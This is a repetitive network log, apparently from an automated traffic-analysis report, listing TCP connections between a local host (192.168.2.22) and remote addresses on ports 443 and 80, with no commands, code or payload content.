Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
